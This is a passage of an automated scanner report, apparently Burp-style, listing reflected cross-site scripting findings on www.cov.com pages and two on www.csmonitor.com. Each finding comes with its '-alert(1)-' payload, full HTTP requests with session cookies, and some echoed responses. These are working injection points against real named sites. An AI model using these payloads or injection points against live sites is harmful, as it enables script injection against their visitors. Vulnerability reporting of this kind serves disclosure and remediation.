GET /honorsrankings?f4088'-alert(1)-'6fb7096a36d=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.70. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/leadersindiversity
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cac5'-alert(1)-'90719ebe248 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /leadersindiversity?1cac5'-alert(1)-'90719ebe248=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.71. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/legalnotices
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0792'-alert(1)-'83d5d12175f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legalnotices?a0792'-alert(1)-'83d5d12175f=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.72. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/mclarty
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354a9'-alert(1)-'6c85014edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mclarty?354a9'-alert(1)-'6c85014edb2=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.73. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/news/detail.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b350e'-alert(1)-'c5433843e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The value of the news request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb11'-alert(1)-'81ed8e1df91 was submitted in the news parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.75. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/newsandevents
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f75a8'-alert(1)-'99f649b592f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsandevents?f75a8'-alert(1)-'99f649b592f=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.76. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/offices
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c98b'-alert(1)-'fd3b25fecf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /offices?2c98b'-alert(1)-'fd3b25fecf2=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.77. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/practice
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4da1'-alert(1)-'610b8b730dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /practice?f4da1'-alert(1)-'610b8b730dc=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.78. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/practice/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53e5'-alert(1)-'9529b8f7a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.79. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/privacypolicy
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df5e0'-alert(1)-'cd34e2cebf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacypolicy?df5e0'-alert(1)-'cd34e2cebf=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.80. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/probonooverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb241'-alert(1)-'14889ea6214 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /probonooverview?eb241'-alert(1)-'14889ea6214=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.81. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/publications
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37aa1'-alert(1)-'7b6396f21de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /publications?37aa1'-alert(1)-'7b6396f21de=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.82. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/recruitingthebestandbrightest
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57c0'-alert(1)-'7612bb35499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recruitingthebestandbrightest?c57c0'-alert(1)-'7612bb35499=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | Diversity | Recruiting the Best & Brightest</title> ...[SNIP]... ecruitingthebestandbrightest/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/recruitingthebestandbrightest/Diversity.aspx?c57c0'-alert(1)-'7612bb35499=1';//]]> ...[SNIP]...
4.83. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/retainingourdiversetalent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c13f'-alert(1)-'a38ede21cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /retainingourdiversetalent?1c13f'-alert(1)-'a38ede21cf4=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | Diversity | Retaining Our Diverse Talent</title>
...[SNIP]... on = '/retainingourdiversetalent/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/retainingourdiversetalent/Diversity.aspx?1c13f'-alert(1)-'a38ede21cf4=1';//]]> ...[SNIP]...
4.84. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/sitemap
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6862'-alert(1)-'2791e98804b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap?a6862'-alert(1)-'2791e98804b=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.85. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/termsofuse
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce89f'-alert(1)-'5ebc528209d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /termsofuse?ce89f'-alert(1)-'5ebc528209d=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1edc1"-alert(1)-"8a5e635d48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA1edc1"-alert(1)-"8a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Wed, 19 Jan 2011 15:47:57 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Thu, 20 Jan 2011 15:47:57 GMT Date: Wed, 19 Jan 2011 15:47:57 GMT Content-Length: 22010 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53b36"-alert(1)-"11f428f14f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice53b36"-alert(1)-"11f428f14f7/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Wed, 19 Jan 2011 15:48:02 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Thu, 20 Jan 2011 15:48:03 GMT Date: Wed, 19 Jan 2011 15:48:03 GMT Content-Length: 22012 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
